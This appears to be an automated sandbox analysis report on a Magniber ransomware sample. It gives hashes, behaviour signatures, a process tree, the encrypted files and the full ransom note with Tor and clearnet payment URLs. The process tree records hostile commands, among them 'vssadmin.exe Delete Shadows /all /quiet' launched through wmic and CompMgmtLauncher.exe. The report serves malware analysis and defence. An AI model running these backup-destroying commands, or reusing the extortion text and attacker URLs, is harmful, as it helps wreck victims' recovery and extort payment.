Overview

overview

10

Static

static

magnibar_5...35.exe

windows7_x64

10

magnibar_5...35.exe

windows10_x64

10

Analysis

  • max time kernel
    239s
  • max time network
    240s
  • platform
    windows7_x64
  • resource
    win7v20210408
  • submitted
    22-07-2021 19:23

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    magnibar_5301e5deb37674296e48d5873862ce32f934fbdfe1a7919f97bddb1138957e35.exe

  • Size

    21KB

  • MD5

    191889cccd8827cb28b5cf9c3a559366

  • SHA1

    c1a6bc0e5d66524eaefa935e9d1dca0c9223bead

  • SHA256

    5301e5deb37674296e48d5873862ce32f934fbdfe1a7919f97bddb1138957e35

  • SHA512

    6d3af286eaa1c3051a739edeaa5f5684f31ff0575082bcd1c2155acfa82657b06b70d7aefc55be3dc1f0877cd4ca77b13f9e53720f5123339bf85eb36bfdfcdf

Score
10/10
magniberransomware

Malware Config

Extracted

Path

C:\Users\Admin\Desktop\readme.txt

Family

magniber

Ransom Note
ALL YOUR DOCUMENTS PHOTOS DATABASES AND OTHER IMPORTANT FILES HAVE BEEN ENCRYPTED! ==================================================================================================== Your files are NOT damaged! Your files are modified only. This modification is reversible. The only 1 way to decrypt your files is to receive the private key and decryption program. Any attempts to restore your files with the third party software will be fatal for your files! ==================================================================================================== To receive the private key and decryption program follow the instructions below: 1. Download "Tor Browser" from https://www.torproject.org/ and install it. 2. In the "Tor Browser" open your personal page here: http://0ab812b814784a70bauxkhdcf.ndkeblzjnpqgpo5o.onion/uxkhdcf Note! This page is available via "Tor Browser" only. ==================================================================================================== Also you can use temporary addresses on your personal page without using "Tor Browser": http://0ab812b814784a70bauxkhdcf.bejoin.space/uxkhdcf http://0ab812b814784a70bauxkhdcf.lieedge.casa/uxkhdcf http://0ab812b814784a70bauxkhdcf.wonride.site/uxkhdcf http://0ab812b814784a70bauxkhdcf.lognear.xyz/uxkhdcf Note! These are temporary addresses! They will be available for a limited amount of time!
URLs

http://0ab812b814784a70bauxkhdcf.ndkeblzjnpqgpo5o.onion/uxkhdcf

http://0ab812b814784a70bauxkhdcf.bejoin.space/uxkhdcf

http://0ab812b814784a70bauxkhdcf.lieedge.casa/uxkhdcf

http://0ab812b814784a70bauxkhdcf.wonride.site/uxkhdcf

http://0ab812b814784a70bauxkhdcf.lognear.xyz/uxkhdcf

Signatures

  • Magniber Ransomware

    Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.

    ransomwaremagniber
  • Process spawned unexpected child process 8 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

    ransomware
  • Modifies extensions of user files 6 IoCs

    Ransomware generally changes the extension on encrypted files.

    ransomware
  • Suspicious use of SetThreadContext 3 IoCs
  • Interacts with shadow copies 2 TTPs 4 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

    ransomware
  • Modifies Internet Explorer settings 1 TTPs 34 IoCs
    adwarespyware
  • Modifies registry class 11 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
    ransomware
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 6 IoCs
  • Suspicious use of SendNotifyMessage 8 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 61 IoCs

Processes

  • C:\Windows\system32\taskhost.exe
    "taskhost.exe"
    1⤵
    • Modifies extensions of user files
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:1124
    • C:\Windows\system32\notepad.exe
      notepad.exe C:\Users\Public\readme.txt
      2⤵
      • Opens file in notepad (likely ransom note)
      PID:1984
    • C:\Windows\system32\cmd.exe
      cmd /c "start http://0ab812b814784a70bauxkhdcf.bejoin.space/uxkhdcf^&1^&46759078^&73^&307^&12"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1768
      • C:\Program Files\Internet Explorer\iexplore.exe
        "C:\Program Files\Internet Explorer\iexplore.exe" http://0ab812b814784a70bauxkhdcf.bejoin.space/uxkhdcf&1&46759078&73&307&12
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious behavior: GetForegroundWindowSpam
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:1808
        • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
          "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1808 CREDAT:275457 /prefetch:2
          4⤵
          • Modifies Internet Explorer settings
          • Suspicious use of SetWindowsHookEx
          PID:1688
    • C:\Windows\system32\cmd.exe
      cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1672
      • C:\Windows\system32\wbem\WMIC.exe
        C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1632
  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Modifies registry class
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:1220
    • C:\Users\Admin\AppData\Local\Temp\magnibar_5301e5deb37674296e48d5873862ce32f934fbdfe1a7919f97bddb1138957e35.exe
      "C:\Users\Admin\AppData\Local\Temp\magnibar_5301e5deb37674296e48d5873862ce32f934fbdfe1a7919f97bddb1138957e35.exe"
      2⤵
      • Suspicious use of SetThreadContext
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of WriteProcessMemory
      PID:1652
      • C:\Windows\system32\cmd.exe
        cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:572
        • C:\Windows\system32\wbem\WMIC.exe
          C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:364
    • C:\Windows\system32\cmd.exe
      cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:824
      • C:\Windows\system32\wbem\WMIC.exe
        C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
        3⤵
          PID:1348
    • C:\Windows\system32\Dwm.exe
      "C:\Windows\system32\Dwm.exe"
      1⤵
      • Modifies registry class
      • Suspicious use of WriteProcessMemory
      PID:1184
      • C:\Windows\system32\cmd.exe
        cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:564
        • C:\Windows\system32\wbem\WMIC.exe
          C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:1648
    • C:\Windows\system32\cmd.exe
      cmd /c CompMgmtLauncher.exe
      1⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:1680
      • C:\Windows\system32\CompMgmtLauncher.exe
        CompMgmtLauncher.exe
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1996
        • C:\Windows\system32\wbem\wmic.exe
          "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
          3⤵
            PID:1796
      • C:\Windows\system32\cmd.exe
        cmd /c CompMgmtLauncher.exe
        1⤵
        • Process spawned unexpected child process
        • Suspicious use of WriteProcessMemory
        PID:1644
        • C:\Windows\system32\CompMgmtLauncher.exe
          CompMgmtLauncher.exe
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:276
          • C:\Windows\system32\wbem\wmic.exe
            "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
            3⤵
              PID:1636
        • C:\Windows\system32\cmd.exe
          cmd /c CompMgmtLauncher.exe
          1⤵
          • Process spawned unexpected child process
          • Suspicious use of WriteProcessMemory
          PID:1792
          • C:\Windows\system32\CompMgmtLauncher.exe
            CompMgmtLauncher.exe
            2⤵
              PID:556
              • C:\Windows\system32\wbem\wmic.exe
                "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
                3⤵
                  PID:1584
            • C:\Windows\system32\cmd.exe
              cmd /c CompMgmtLauncher.exe
              1⤵
              • Process spawned unexpected child process
              • Suspicious use of WriteProcessMemory
              PID:2040
              • C:\Windows\system32\CompMgmtLauncher.exe
                CompMgmtLauncher.exe
                2⤵
                • Suspicious use of WriteProcessMemory
                PID:1148
                • C:\Windows\system32\wbem\wmic.exe
                  "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
                  3⤵
                    PID:1876
              • C:\Windows\system32\vssadmin.exe
                vssadmin.exe Delete Shadows /all /quiet
                1⤵
                • Process spawned unexpected child process
                • Interacts with shadow copies
                PID:996
              • C:\Windows\system32\vssadmin.exe
                vssadmin.exe Delete Shadows /all /quiet
                1⤵
                • Process spawned unexpected child process
                • Interacts with shadow copies
                PID:1276
              • C:\Windows\system32\vssadmin.exe
                vssadmin.exe Delete Shadows /all /quiet
                1⤵
                • Process spawned unexpected child process
                • Interacts with shadow copies
                PID:764
              • C:\Windows\system32\vssadmin.exe
                vssadmin.exe Delete Shadows /all /quiet
                1⤵
                • Process spawned unexpected child process
                • Interacts with shadow copies
                PID:1636
              • C:\Windows\system32\conhost.exe
                \??\C:\Windows\system32\conhost.exe "-1915609904-1400242751317885946-2056629828158640875910523623961716116093-708400240"
                1⤵
                • Suspicious use of WriteProcessMemory
                PID:556
              • C:\Windows\system32\vssvc.exe
                C:\Windows\system32\vssvc.exe
                1⤵
                  PID:564

                Network

                MITRE ATT&CK Enterprise v6

                Replay Monitor

                Loading Replay Monitor...

                Downloads

                • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\DXEYWGO7.txt
                  MD5

                  7c366193b9b3a7f974793185ff360be6

                  SHA1

                  bec6c8710f7c1ec6add839717f055853a5057250

                  SHA256

                  423800d68c2448c10c44873b39786d7753957779edbfa55481afc1d431d2e8db

                  SHA512

                  aa9188e8fd0071f102c12d71d70a96c74e336dc0d6ba5922f77a6d6adcc87485f8ca76f64d9a156159716027aeafa58cfd03657f21b4bf3b04cafde7b2f8a256

                  Download Submit

                • C:\Users\Admin\Desktop\AssertOptimize.rtf.uxkhdcf
                  MD5

                  8d29516d7ff8707fad5ec37db984bc73

                  SHA1

                  9b6c12fd93cf0aa5071e23f44723f2bcf87b9edc

                  SHA256

                  e356189196a9f3039258670b63849bd98c76452b1c642c79dc706ac8414374d8

                  SHA512

                  28cf4f348f0366418ed7b81e5a7dc238c2c2297c4324331cab18b6b8392d13b358b3b27f2b3b049da3dd32c0b259ee8805651c62f6b2b25d9cefe453ea0d0515

                  Download Submit

                • C:\Users\Admin\Desktop\ConfirmApprove.crw.uxkhdcf
                  MD5

                  d13c0333a164585e53505c703905da65

                  SHA1

                  fefb21f5e8a1064f03e39cf7a543fd3c3101e69b

                  SHA256

                  2d15b21269dad6542be84750ed0e99e0008acd38ad6406f2b4c6da8462c7915c

                  SHA512

                  3408ec0f865dabb97ed92a94f81ed608ec5be138147ec8b6c6d36868763ba23ef5844f7c9030ab47b8e10e57a5ad8f2c40809cacceda4c6cd745cc4a077839b7

                  Download Submit

                • C:\Users\Admin\Desktop\ConvertToPublish.xlsx.uxkhdcf
                  MD5

                  2c583472eab221576d3da5cd773546d1

                  SHA1

                  1b8e20ff2c662582043862c0c13228e1fcda7ad6

                  SHA256

                  3eed9b99945954c07e79754116c3e19cb826d3bc6525769c2f35da6939c8b2ed

                  SHA512

                  1aaaa717ec6c938eb3aecbf00d1f46445be0217410f47c6fab4031ce0e94e6656fb3a90d8f8615b2cea4080cd53e68e4bd99e0f3468d21ac2a149bcd4f86c8d5

                  Download Submit

                • C:\Users\Admin\Desktop\DebugSkip.png.uxkhdcf
                  MD5

                  c75b7cc59a9b871d76284127d86e7ec1

                  SHA1

                  9337519ff10458f5c5b821c655e3d427a05c2c6a

                  SHA256

                  6d3a11f9c71194b07454d46767257bc2f887086aef19a9a2b414ea76db95742d

                  SHA512

                  eb1c1f1e74fa32e09bde1fe621c601b0ca7ec4f840e2c870d1ec74c82f81dbf013041cde44cd3f6a1f21706aad91ee0048c552fa12a22a716ec19df03cd7963e

                  Download Submit

                • C:\Users\Admin\Desktop\GrantImport.doc.uxkhdcf
                  MD5

                  06c1ec06a71010e9e7e758d1df2ea1cb

                  SHA1

                  e5f79ff8251b66962ec4ccfc1cb8337e6c5595c3

                  SHA256

                  e64f3e11457b7894b837aada1a1d887e80164942e325de9d399cb50cd5712387

                  SHA512

                  0b37c50adec4648d1e041a2224520c1c6be7c7d4ee5f9806bab7f7127c2c182726095304d8515b2a6acd5beb13f3b8982d828018ea7c3369253c9d4a52dddf24

                  Download Submit

                • C:\Users\Admin\Desktop\RenameDisconnect.odp.uxkhdcf
                  MD5

                  37869ca04fec18c4fbaab3e3d514cf9e

                  SHA1

                  f9991a1e6f73e22493fbaaaa974ef18d5496f6b2

                  SHA256

                  00dbb672357ac82a640f250827693cc2104b51617e01bb2a62033ddacf6591e9

                  SHA512

                  39a96a593a30c93629e3aab30aca803e00b322e6d16cdde75693e5e6d0610611a10be713d393cd1139a9f6af3804c61213197ec641cfd57b724867a8ed9a9c6a

                  Download Submit

                • C:\Users\Admin\Desktop\SkipAdd.png.uxkhdcf
                  MD5

                  d05701db254bb2d332ce84b2a1e67672

                  SHA1

                  3308c68142b5979fc89b574f63cab76f093be1b3

                  SHA256

                  7503b68044adffd6fec8aea62bf706e76e1357fdad1dfd9e19c51402c1dfd855

                  SHA512

                  e5ae3ccf10cd083b3fed113c371900c7890d84a10a9219d00f989660d6ca93a84ee459d1e66e16302fd79f8804de3dbdf6249f075dceed34f4719f430a205651

                  Download Submit

                • C:\Users\Admin\Desktop\SplitProtect.pot.uxkhdcf
                  MD5

                  875b687b71b8c01145098f3f5964014b

                  SHA1

                  ba62b26bcfc8d1cfb043ae61d4e87c61438a3a06

                  SHA256

                  7b7006f557016f159c0d7798e09c95e4f9ce161b452e1d78a8e7d8cb7dbb16c1

                  SHA512

                  cbf7bf0578908653f43b3e1169bbfa575aa36dd441b771b1f58d0cc8fc62f44fa997fc73d643cb272d219b38b1656dd64f2a376c6936622671f35cdb37acdc8e

                  Download Submit

                • C:\Users\Admin\Desktop\UnregisterUndo.pps.uxkhdcf
                  MD5

                  3214348bb4f0ad59ae4b450bc252e157

                  SHA1

                  30e39101f401bb8e4ca9acd343c54d0b809aa4e4

                  SHA256

                  8bdeed0ac50c9ae6307d6b67e5706d38e1eab6742c9beb5e38e9ef90c8dc1c77

                  SHA512

                  ffc943cd9dad5767688b2dc4b07ff831aa5021d928fed4a18053ddb7eb936e8e394cf9cf02d1647502bdf9f062d74a3329f35124ef9a4aacad3a231fda23ed90

                  Download Submit

                • C:\Users\Admin\Desktop\readme.txt
                  MD5

                  762194dec56f3a41779d8ee75834b0bd

                  SHA1

                  b41ca8725bd9c387a5e8ad9f54d8ea71251053db

                  SHA256

                  eaa5a2cb99b39aa1cefc38807bc204cc7126cf5afe16bec007adbe0549b3d776

                  SHA512

                  abf93c896c7c08871f60cc6bf12b3d3e3310e059a35a7386d5f194df7db8a3e3485ccac840dd239d4680c72ef6e634cf56f34bdabbdbbf54bbaed85917cf4dbb

                  Download Submit

                • C:\Users\Public\readme.txt
                  MD5

                  762194dec56f3a41779d8ee75834b0bd

                  SHA1

                  b41ca8725bd9c387a5e8ad9f54d8ea71251053db

                  SHA256

                  eaa5a2cb99b39aa1cefc38807bc204cc7126cf5afe16bec007adbe0549b3d776

                  SHA512

                  abf93c896c7c08871f60cc6bf12b3d3e3310e059a35a7386d5f194df7db8a3e3485ccac840dd239d4680c72ef6e634cf56f34bdabbdbbf54bbaed85917cf4dbb

                  Download Submit

                • \??\PIPE\srvsvc
                  MD5

                  d41d8cd98f00b204e9800998ecf8427e

                  SHA1

                  da39a3ee5e6b4b0d3255bfef95601890afd80709

                  SHA256

                  e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                  SHA512

                  cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                  Download Submit

                • memory/276-103-0x0000000000000000-mapping.dmp

                  Download

                • memory/364-95-0x0000000000000000-mapping.dmp

                  Download

                • memory/556-101-0x0000000000000000-mapping.dmp

                  Download

                • memory/564-91-0x0000000000000000-mapping.dmp

                  Download

                • memory/572-94-0x0000000000000000-mapping.dmp

                  Download

                • memory/824-96-0x0000000000000000-mapping.dmp

                  Download

                • memory/1124-73-0x00000000003D0000-0x00000000003D4000-memory.dmp

                  Filesize

                  16KB

                  Download

                • memory/1148-100-0x0000000000000000-mapping.dmp

                  Download

                • memory/1220-61-0x00000000025F0000-0x0000000002600000-memory.dmp

                  Filesize

                  64KB

                  Download

                • memory/1348-97-0x0000000000000000-mapping.dmp

                  Download

                • memory/1584-109-0x0000000000000000-mapping.dmp

                  Download

                • memory/1632-90-0x0000000000000000-mapping.dmp

                  Download

                • memory/1636-108-0x0000000000000000-mapping.dmp

                  Download

                • memory/1648-93-0x0000000000000000-mapping.dmp

                  Download

                • memory/1652-67-0x0000000001CC0000-0x0000000001CC1000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/1652-72-0x0000000001D30000-0x0000000001D31000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/1652-62-0x00000000002E0000-0x00000000002E1000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/1652-65-0x0000000000310000-0x0000000000311000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/1652-70-0x0000000001D10000-0x0000000001D11000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/1652-71-0x0000000001D20000-0x0000000001D21000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/1652-69-0x0000000001D00000-0x0000000001D01000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/1652-68-0x0000000001CD0000-0x0000000001CD1000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/1652-64-0x0000000000300000-0x0000000000301000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/1652-60-0x0000000000020000-0x0000000000025000-memory.dmp

                  Filesize

                  20KB

                  Download

                • memory/1652-98-0x0000000002390000-0x0000000002391000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/1652-63-0x00000000002F0000-0x00000000002F1000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/1652-66-0x0000000001CB0000-0x0000000001CB1000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/1672-88-0x0000000000000000-mapping.dmp

                  Download

                • memory/1688-99-0x0000000000000000-mapping.dmp

                  Download

                • memory/1768-87-0x0000000000000000-mapping.dmp

                  Download

                • memory/1796-111-0x0000000000000000-mapping.dmp

                  Download

                • memory/1808-92-0x0000000000000000-mapping.dmp

                  Download

                • memory/1876-112-0x0000000000000000-mapping.dmp

                  Download

                • memory/1984-75-0x000007FEFB6A1000-0x000007FEFB6A3000-memory.dmp

                  Filesize

                  8KB

                  Download

                • memory/1984-74-0x0000000000000000-mapping.dmp

                  Download

                • memory/1996-102-0x0000000000000000-mapping.dmp

                  Download